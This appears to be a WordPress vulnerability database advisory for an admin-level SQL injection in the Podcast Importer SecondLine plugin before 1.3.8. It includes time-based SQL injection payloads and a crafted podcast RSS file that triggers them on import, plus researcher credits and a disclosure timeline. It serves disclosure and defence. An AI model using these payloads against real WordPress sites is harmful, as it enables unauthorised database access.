WordPress Plugin Vulnerabilities
Podcast Importer SecondLine < 1.3.8 - Admin+ SQLi
Description
The plugin does not sanitise and properly escape some imported data, which could allow SQL injection attacks to be performed by imported a malicious podcast file
Proof of Concept
Put the XML below on a web server (replacing the PAYLOAD with the correct one), then import a podcast (/wp-admin/tools.php?page=secondlinepodcastimport) and put the URL to the XML in the Podcast Feed URL field and click import Payloads: v < 1.3.0 - https://satchmo.secondlinethemes.com/?p=82%') union select (sleep(10));# v < 1.3.8 - <![CDATA[https://satchmo.secondlinethemes.com/?p=82%") union select (sleep(5))#]]> <?xml version="1.0" encoding="utf-8"?> <?xml-stylesheet type="text/xsl" href="https://dixie.secondlinethemes.com/wp-content/plugins/seriously- simple-podcasting/templates/feed-stylesheet.xsl"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0"> <channel> <title>Dixie WordPress Theme</title> <atom:link href="https://dixie.secondlinethemes.com/feed/podcast" rel="self" type="application/rss+xml" /> <link>https://dixie.secondlinethemes.com/</link> <description>A Powerful Podcasting Theme</description> <lastBuildDate>Mon, 09 Nov 2020 10:08:04 +0000</lastBuildDate> <language>en-US</language> <copyright>© 2021 Dixie WordPress Theme</copyright> <itunes:subtitle>A Powerful Podcasting Theme</itunes:subtitle> <itunes:author>Dixie WordPress Theme</itunes:author> <itunes:summary>A Powerful Podcasting Theme</itunes:summary> <itunes:owner> <itunes:name>Dixie WordPress Theme</itunes:name> <itunes:email>gotyed@gmail.com</itunes:email> </itunes:owner> <itunes:explicit>clean</itunes:explicit> <googleplay:author>Dixie WordPress Theme</googleplay:author> <googleplay:email>gotyed@gmail.com</googleplay:email> <googleplay:description>A Powerful Podcasting Theme</googleplay:description> <googleplay:explicit>No</googleplay:explicit> <item> <title>Episode 10: New Recording Studios</title> <link>https://dixie.secondlinethemes.com/podcast/episode-10-new-recording-studios/</link> <pubDate>Wed, 24 Jul 2019 11:16:50 +0000</pubDate> <dc:creator>Dixie</dc:creator> <guid isPermaLink="false">PAYLOAD</guid> <description> <![CDATA[aa]]> </description> <itunes:subtitle> <![CDATA[aa]]> </itunes:subtitle> <content:encoded> <![CDATA[aa]]> </content:encoded> <enclosure url="https://dixie.secondlinethemes.com/podcast-download/82episode-10-new-recording-studios.mp3" length="5425142" type="audio/mpeg"></enclosure> <itunes:summary> <![CDATA[aa]]> </itunes:summary> <itunes:explicit>clean</itunes:explicit> <itunes:block>no</itunes:block> <itunes:duration>02:16</itunes:duration> <itunes:author>Dixie</itunes:author> <googleplay:description> <![CDATA[aa]]> </googleplay:description> <googleplay:explicit>No</googleplay:explicit> <googleplay:block>no</googleplay:block> </item> </channel> </rss>
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
YICHENG LIU-ZTE CHENFENG lab
Submitter
YICHENG LIU-ZTE CHENFENG lab
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-21 (about 2 years ago)
Added
2022-03-21 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)